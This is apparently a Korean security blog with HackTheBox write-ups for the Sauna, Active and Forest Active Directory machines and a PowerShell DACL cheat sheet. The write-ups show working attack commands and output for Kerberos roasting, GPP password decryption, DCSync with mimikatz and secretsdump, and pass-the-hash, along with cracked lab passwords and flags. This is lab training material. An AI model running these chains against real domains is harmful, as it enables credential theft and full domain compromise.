ldap null binding은 성공했지만 제한이 걸려 있어 Domain Object들 조회는 불가능했다.

HTTP

80 포트에 접속해보면 위와 같은 화면이 나온다.

sub directory enum도 해보고 sqli, file download vuln 등 취약점이 발생할 여지가 있는지 확인해봤지만 눈에 띄는 것은 없었다.

얻을 수 있는 정보로는 사원 이름이 있다.

Exploit (Initial Access)

┌──(root㉿kali)-[~/Desktop/htb/Sauna]
└─# cat username
James.Doe
JDoe
Fergus.Smith
FSmith
Shaun.Coins
SCoins
Hugo.Bear
HBear
Bowie.Taylor
BTaylor
Sophie.Driver
SDriver
Steven.Kerb
SKerb

해볼만한게 홈페이지에서 얻은 사원 정보로 username list를 만들어 도메인 계정을 찾아내는 것 밖에 없는 것 같아, 얻은 사원 이름을 바탕으로 [lastname].[firstname], [1st char][firstname] user list를 만들었다.

https://github.com/urbanadventurer/username-anarchy 를 사용하면 간단하게 생성해준다.

┌──(root㉿kali)-[~/Desktop/htb/Sauna]
└─# ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL  --dc 10.10.10.175 ./g_username

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 22/11/23 - Ronnie Flathers @ropnop

2023/11/16 01:24:52 >  Using KDC(s):
2023/11/16 01:24:52 >      10.10.10.175:88

2023/11/16 01:24:52 >  [+] VALID USERNAME:     fsmith@EGOTISTICAL-BANK.LOCAL
2023/11/16 01:24:59 >  Done! Tested 88 usernames (1 valid) in 7.185 seconds

┌──(root㉿kali)-[~/Desktop/htb/Sauna]
└─# impacket-GetNPUsers EGOTISTICAL-BANK.local/fsmith -no-pass -request -dc-ip 10.10.10.175    
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:40db1d85f6b5ffc5d1b1dd04f8d890d8$12336aa77ef1a1a34b7376e033a9892c8f8865ea4d643da35cd776645dff57e37cf1b5064b2b4f55ea25e97096a1423f3416a22c2de51ec9dddb83be80df944f36b12459c88345dcb8043b13e616cdc89370eb39cfafb4c230929fad6abdd6228d5520e8cee9a3f0b1afb85dddebbcf04cf530410793d1df926167da9e4feda4cb4cd3b08d49811467ac5cc72c1ce1c139c4a1815c639c196a8b9767726e5f2c0317f15c4c9c2677b7075d6fc4b69649d1d784e0f212f38ed7943c90c7582df6675567ce5c2827c362d9cf045abc15be60851f18f280b40098d005560c2eb195c0d21644e8766cd39a08f71890565b13fa4a86d6c041ab66610ab87a71326b25

┌──(root㉿kali)-[~/Desktop/htb/Sauna]
└─# hashcat -a 0 ./tgt /usr/share/wordlists/rockyou.txt        
<SNIP>

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:061634624816a688c950d090c310eee6$f2c757209e141cf0e085754426ede39b6d21d9a7b0617212d7733fd0f53698a7606edc198be5155d2da5512fb95ab5c83f530c1312aea55eb9215bdb60e900971baaa53fd40d05e3edcd1faa5d4e4dc1139715fa30c7be2e56fbdde9f4bbd7e354e3fb0d913ea188932d63bf9c29bd6beab33df5dd720ca56c7bdf9998a723beace452698480dacb41763690e5ba2fb7df7c60c75764050482f0f1dcc9e71db173a0911efc55cc19d1bcc5f97050462afcc276827a5de1468d749d31b4fe27a6de5a1590d94f493c193d365d450fbcbcd03ddcb8569229f8ac52834d64de85f0e71524a4794e858e4dc11e31ea6394155efc9bed2165c8ea9bf544797b279481:Thestrokes23

Kerbrute를 통해 FSmith 유저가 존재한다는 사실을 알 수 있었고 해당 유저에 AS-REP Roasting을 시도해보니 성공적으로 TGT를 획득할 수 있었다.

FSmith 유저는 WinRM 접속 권한이 있었다.

Post-Exploit

Surveying

HSmith, FSmith, svc_loanmgr 유저가 존재한다.

BloodHound 결과에서는 악용할만한 DACL이 보이지 않아 winPEAS를 돌려봤는데, autologon 부분에서 svc_loanmanager의 credential을 찾을 수 있었다.

아마 svc_loanmgr에 해당하는 password인 것 같다는 생각이 든다.

Auto Logon 설명 : https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/turn-on-automatic-logon

bloodhound에 따르면 svc_loanmgr은 domain에 대한 DCSync 권한이 있다.

따라서 mimikatz 등을 통해 NTDS.dit을 덤프할 수 있을 것이다.

Privilege Escalation

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\mimikatz64.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator
[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

mimikatz로 ntds를 덤프한 후 pass-the-hash를 통해 Administrator 권한을 얻었다.

[AD] Active

dyp4r — Tue, 2 Jul 2024 17:23:34 +0900

Challenge Information

Enumeration & Attack Planning

Network

──(root㉿kali)-[~/Desktop/htb]
└─# nmap -sV 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:12 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 52.94% done; ETC: 01:13 (0:00:14 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).
Not shown: 983 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 05:13:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.45 seconds

┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap 10.10.10.100 -p 5985   
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:22 EDT
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).

PORT     STATE  SERVICE
5985/tcp closed wsman

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

domain, kerberos, ldap 포트가 열려 있는 것을 보니 domain controller 같다.

domain은 active.htb 다.

WinRM은 닫혀있다.

smb

┌──(root㉿kali)-[~/Desktop/htb]
└─# crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\: 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users

SMB Null Access를 시도해보니 성공했고 Share List까지 얻을 수 있었다.

Replication라는 Share에 READ 권한이 있다는 것을 확인해 접속해보기로 했다.

┌──(root㉿kali)-[~/Desktop/htb]
└─# smbclient  //10.10.10.100/Replication
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

        10459647 blocks of size 4096. 5734868 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

        10459647 blocks of size 4096. 5734868 blocks available
smb: \active.htb\> cd ..
smb: \> lcd ./smb/
smb: \> prompt
smb: \> recurse
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

폴더 구조를 보니 SYSVOL 폴더인 것 같다.

SYSVOL 폴더를 복제했는데 권한 설정이 잘못되어 모든 사용자에게 노출된다는 시나리오로 추정된다.

일단 모든 내용들을 로컬로 가져왔다.

Sysvol 폴더는 Domain Controller에 기본적으로 존재하는 공유 폴더로 AD에서 중요한 역할을 한다. GPO, Logon Script 배포 등이 해당 폴더를 통해 이뤄진다.

Exploit (Initial Access)

┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# find -name *.xml                                         
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>                                     

┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

Sysvol의 모든 내용물을 열람할 수 있기에 혹시 gpp가 존재하나 싶어 xml 파일을 찾아봤다.

그 결과 SVC_TGS 유저의 (encrypted) gpp password를 얻을 수 있었고 decrypt하여 비밀번호를 획득했다.

비밀번호의 내용은 GPP가 아직도 real world에 많이 존재한다는 사실을 상기시켜주는 것 같다. :)

최신 버전에서는 비활성화 됐지만, 옛날 버전에서는 예약 작업 생성, 모든 머신의 로컬 관리자 암호 변경 등과 같은 자동화 작업을 중앙에서 쉽게 수행하기 위해 “Group Policy Preferences(GPP)” 기능을 도입했다. 편리한 기능이지만 작업 수행을 위해 필요한 Credential이 Sysvol 폴더의 xml 파일에 AES-256으로 암호화되어 저장되고 이 키는 MSDN에 공개되어 있기 때문에 열람이 가능하다면 Credential을 해독할 수 있다.
위에서 xml 확장자의 파일을 검색한 이유가 바로 이 때문이다.

gpp-decrypt는 MSDN에 공개된 AES-256 Key로 복호화를 수행해준다.

참고: https://rootdse.org/posts/active-directory-basics-3/

┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

        10459647 blocks of size 4096. 5728424 blocks available
smb: \> cd SVC_TGS\Desktop
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# cat user.txt                                                              
ed7a69c488540caa823d0ffeadd0aad4

smb users share를 통해 user flag를 획득했다.

user flag: ed7a69c488540caa823d0ffeadd0aad4

Post-Exploit

Surveying

┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-11-07 19:02:31.084947             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$0ae35f4788b2c93d50f36d9594d7743a$6d5fc65c178da9ae0679e36fcfbfbfabecc9d7c2c7d67c212647bfd2e7b6dcd588de5d45aef126c173081a24ba6027dc8709d9305e0d19f1cbcc0516e0133c6c5402ddd65eaee08238d6a963c982f98c3b70095053f31d416a577a24caf9198b8756ac2429f8c2725bdb2a510f84d2605b1ffde9c076738aba426cfa244c45c371203fa9b8f5aa680442a35cff1c3ac51b47bf165e3523a934a0809d12a8ea8610d5a488ef9044e01bf74196ccdc80688eb31c6285b330d62cd6d43bc2e85ad84227c26dc8725edffe5a87d2f20bce62ffc12f6746ad5630970d6a211c4b343f2dff14f976265b222f548ba4efc4fb49d44e71dc68dc552e64d0039d47c21c038b2d6808bda90dfde7a1e517252c074a8bbe2adf00ec81fb03b360b984b61f2d162f1a03863bf4ad606d14965bdc5e004c14e90941c61804d525856f0e585c1b8b14adbb9f20a20d74d1daaaf826b4db69dcc9377c32981cce644848b9d35c5f1b4c66065cfbbe40e179f6a45f140d59c1e6c0f3aa2acf01503dda1ff492ef6777214a6c7d9b2811b494a897befad221bae659c5aa73e1caefc55aaba67eadcd92a6d6c659832a7d99eaec96f0165b3d1564491f75a3749536c3981520593e4f1a87f96f2a7d7e6e01a3eb9e7b10e7bf05f1a3db393a687e8151e72f944a631fbbbbb61e4fa85b76574fe67d0f5fc7242ed75e362517ef6f6f5713020b1b1b9675ef74fb0ac3256b89ac858137106cf618ab289fbfdc448220a4bf300a50b53d555befc193ce866efe313938245ac90a04d1cfbb49291d471e6400c5027583acdeb55e0a0f4ebeb7ba3a1bfe9675920e610bb9ce530b713a5bb2ba429e38e1ded8ace35b0a77ff4875036582ecc9111775b44142050dc8f41595da7b63c2a7bda5b539328e34c583c4a29beaa1d06b3a208cd88e7ea341dadccb7997f2536ac48ff0076fc43856417b08053d7ad094f3b3f8cbe2e2ed65ecf4fe7031d6bfecaa6631decebc1db14836db38de83f26afff727fabc6c7859e743715860c5ad033c9b6a302b9562ebaddbf65f7363f68ada9adfee8bfc0fcbd133b261d13b5831790a30936e17148d58d43173cd4a81b166b19842c5e41c12d81941ab2844a2679ebb9ad4000f97ae35d0927489618f8a0defacbd26207a894c4271b21b8d84a6263785dd83443fcf2a324f63bfdf3410b3129dad95883d1548262b34ba1ac6b769e1c25a01142cf8ac1ea6f96c2c8cc82c2042e59c0de533eb0721

┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# hashcat -a 0 tgt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

<SNIP>:Ticketmaster1968

Kerberoasting 공격 시도는 성공했고 운좋게 Administrator의 TGT 값을 획득했다.

또한 hashcat으로 복호화에 성공해 평문 비밀번호를 획득했다.

Privilege Escalation

┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# smbclient -U "Administrator%Ticketmaster1968" //10.10.10.100/Users                                    
Try "help" to get a list of possible commands.
smb: \> cd Administrator\Desktop\
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C

┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat root.txt                                                                                          
19dce8ccdb0dc1ef84308167dfd88884

획득한 administrator credential로 Users Share에 접속해 root flag를 획득했다.

root flag: 19dce8ccdb0dc1ef84308167dfd88884

만약 os command를 실행하고 싶다면 wmiexec, smbexec, atexec 등의 기법을 사용하면 된다.
impacket과 crackmapexec에 기능이 있다!

[ETC] Powershell로 DACL을 부여하는 방법

dyp4r — Sun, 16 Jun 2024 16:10:14 +0900

CheatSheet


> Import-Module ActiveDirectory

# 권한을 부여할 사용자의 SID를 get / ACE를 구성할 때 사용
> $usid = (Get-ADUser -Identity [username]).SID 

# target principal의 DN / ACL object를 가져오고 변경 사항을 적용할 때 사용
> $object_dn = "CN=[target],OU=[object unit],DC=[domain],DC=[tld]"  

# target principal의 ACL Object를 get
> $acl_object = Get-ACL -Path "AD:$object_dn"

# 적용할 ACE 생성
> $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $usid,
    [System.DirectoryServices.ActiveDirectoryRights]::[권한],
    [System.Security.AccessControl.AccessControlType]::Allow
)

# ACL Object에 생성한 ACE를 적용
> $acl_object.AddAccessRule($ace)

# 변경된 ACL을 target principal에 적용
> Set-ACL -Path "AD:$object_dn" -AclObject $acl_object

[AD] Forest

dyp4r — Fri, 14 Jun 2024 19:03:53 +0900

Challenge Information

Enumeration & Attack Planning

Network

┌──(root㉿kali)-[~/Desktop/htb/Forest]
└─# nmap -sV 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 00:26 EDT
Nmap scan report for 10.10.10.161
Host is up (0.22s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-02 04:33:26Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

domain, kerberos, ldap 포트가 열려 있는 것을 보니 domain controller 같다.

domain은 htb.local이다.

smb

smb가 열려 있기 때문에 먼저 smb banner grabbing과 null & anonymous access 가능 여부를 확인해봤다.

그 결과 Windows Server 2016이라는 것을 확인할 수 있고 null session은 가능하지만 guest session은 불가하다는 것을 알 수 있었다.

null session으로 smb 공유 목록은 얻을 수 없었다.

`crackmapexec smb [ip] -u '' -p '' —shares` 를 사용해도 된다.

rpc

rpcdump를 통해 노출된 rpc service들을 확인해봤다.

SAMR 서비스가 노출된 것을 확인하여 rpcclient로 domain user를 enumeration 할 수 있는지 확인해봤다.

┌──(root㉿kali)-[~/Desktop/htb/Forest]
└─# rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[svc-alfresco] rid:[0x47b]

이렇게 얻은 유저 목록은 Kerberos AS-REP이나 Roasting 공격에 활용할 수 있다.

`crackmapexec smb [ip] -u '' -p '' --users` 를 사용하면 간편하다.

ldap

ldapsearch로 null binding을 요청해보니 성공했다.

ldap 요청이 가능해진다면 domain에 존재하는 object들의 정보들을 쿼리할 수 있으므로 공격에 매우 용이해진다.

예를들면 Do not require Kerberos Preauthentication 설정이 활성화된 유저들만 쿼리해 AS-REP Roasting을 진행할 수 있고 SPN Attribute가 존재하는 서비스 유저를 상대로 Kerberoasting을 할 수도 있다.

crackmapexec도 ldap 상호작용을 제공해주는데, 툴 자체의 문제인지 항상 오류가 떠서 나는 ldap 기능은 사용하지 않는다.

Vulnerability

┌──(root㉿kali)-[~/Desktop/htb/Forest]
└─# impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request
Impacket v0.11.0 - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2024-06-14 00:30:27.705356  2024-06-14 00:30:14.377199  0x410200 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:97c5749f54f2d771764a7f7845450b50$8fc0df2785f9917a2a5c4d30ff3b72a64507111d589cebd1d6f9bf44c43b2668c93bb6f7c5b40b83e9fb69981ca4c956c5898a194520a3d80c9d8147326c27809dccdbafaab0867b1154ca6d1b8f0715e356a9c9f14b0c581600124c3e133f49854ad88e51bd7117b56a8333e874916bfb2e9e73fddc41e086b757039f3197176a390e536066b2a03e3e483b23e9892fd28d2737016ecef0d687b4b2e6797922a6e814ea2ca40ed91a5b5a13793f7e9ec99be1052e9731c112985ee8c8a2e9400758b27d635c3c6eeafd8e73d249dae198f4ff7deb33178338b0bebcad1bbde2cf8864acf40b

ldap 접근이 가능하므로 impacket GetNPUsers를 돌려 AS-REP Roasting에 취약한 유저를 찾아내고 -request 옵션을 통해 TGT를 뽑아냈다.

┌──(root㉿kali)-[~/Desktop/htb/Forest]
└─# hashcat -a 0 -m 18200 ./svc_tgt /usr/share/wordlists/rockyou.txt 

<SNIP>

$krb5asrep$23$svc-alfresco@HTB.LOCAL:ad4b25447a8b720a2a7b6196e08b21eb$a33b99fae045340dd6b87539a74561fc45742c00e8b1494274ac05545aaf4bd35d4d44c6099dc42a52c809ae95698890cf94e03379b1d4c196447f3e21df58e6772620f911e0b9c4e5cd4052652281f2b506ca43461a2c5d3b20b0c46c0b9dee0646eb851842c657b7b33bd7ed825d04c10505ab83ad5f97406a9e8b6373790a4db7f34ae6cf31519098f137c194de038cd7838043d5080a201971172d33c1b8458d39a70065837e07b848442e405fa642d96e60226f632ed4ccda9ebcbbf6d7c081220f8e9539aef7fd21fb5aa7e3aab36544970ec044f6147290b4852db0969b148f8a6c63:s3rvice

rockyou로 crack에 성공했다.

svc-alfresco:s3rvice

이 경우 ldap 접근이 가능하기 때문에 GetNPUsers가 내부적으로 ldap 쿼리를 날려 취약한 유저를 자동으로 찾아낸 후 AS REQ를 날린거지만, ldap 접근이 안되는 경우 userlist를 인자로 줘서 brute forcing 해야 한다.

Exploit (Initial Access)

crackmapexec로 winrm 접속이 가능하다는 사실 확인 후, winrm으로 접속해 user flag를 얻었다.

Post-Exploit

Surveying

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound110.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound110.exe
<SNIP>

권한, 그룹, 서비스 등의 lpe vector를 체크했지만 그럴듯한게 보이지 않아 SharpHound를 업로드 후 돌려봤다.

BloodHound가 제대로 표시를 해주지 않아서 수동으로 찾았다.

보면 svc-alfresco는 Account Operators 그룹의 멤버고, 이 그룹은 Exchange Windows Permissions 그룹에 대한 GenericAll 권한이 있다.

마지막으로 Exchange Windows Permissions 그룹은 도메인에 대한 WriteDacl 권한을 갖는다.

그렇다면 다음과 같은 시나리오를 세울 수 있다.

Account Operators의 GenericAll Dacl을 이용해 Exchange Windows Permissions 그룹에 사용자를 추가한다.
추가한 사용자로 HTB.LOCAL 도메인에 대한 DCSync Dacl을 임의 사용자에 추가한다.
DCSync가 추가된 임의 사용자로 NTDS.dit을 추출한다.

DCSync 참고 : https://dypar-study.tistory.com/190

[DACL] DCSync

DCSync?AD 환경에는 Domain Controller 간의 데이터 동기화를 위한 과정인 Replication이 존재한다.Replication에 사용되는 특별한 권한들이 있는데, 이를 이용하면 NTDS.dit 데이터를 추출할 수 있다.이 특별한

dypar-study.tistory.com

Privilege Escalation

add user in Group “Exchange Windows Permission”

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user /add sasa P@ssw0rd /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net groups "Exchange Windows Permissions" /add sasa
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net users sasa /domain
User name                    sasa

<SNIP>

Logon hours allowed          All

Local Group Memberships
Global Group memberships     ***Exchange Windows Perm***Domain Users
The command completed successfully.

sasa 유저를 하나 생성해서 Exchange Windows Permissions 그룹에 추가했다.

write DCSync Dacl to Domain

python3 dacledit.py -action write -rights DCSync -target-sid "S-1-5-21-3072663084-364016917-1341370565" -principal sasa htb.local/sasa:P@ssw0rd

bloodhound에 나와있는 abuse 방법에 오류가 있어 위와 같이 수정해서 사용했다.

┌──(root㉿kali)-[~/Desktop/htb/Forest]
└─# impacket-secretsdump htb.local/sasa:P@ssw0rd@10.10.10.161                        
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
<SNIP>

DCSync를 준 후 secretdump를 돌리면 ntds를 추출할 수 있다.

추출한 Administrator의 NT Hash로 Pass The Hash를 하면 Administrator로 권한 상승을 할 수 있다.